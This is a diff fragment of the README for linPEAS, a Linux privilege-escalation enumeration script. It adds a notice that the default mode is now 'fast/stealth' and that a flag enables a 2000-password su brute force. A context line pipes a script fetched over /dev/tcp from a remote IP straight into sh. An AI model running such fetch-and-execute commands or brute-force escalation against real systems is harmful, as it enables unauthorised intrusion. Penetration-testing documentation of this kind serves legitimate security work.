peass-ng/PEASS-ng/linPEAS/README.md

 cat < /dev/tcp/10.10.10.10/80 | sh
 ```

+## IMPORTANT CHANGE
+**For satisfying most users and thanks to the incorporation of the 2000pwds/user su bruteforce, the default behaviour of linpeas has been changed to fast/stealth (no writting to disk, no 1min processes check, and no su BF).
+Use the parameter -a to execute all these checks**

 ## Basic Information

 The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD and OpenBSD).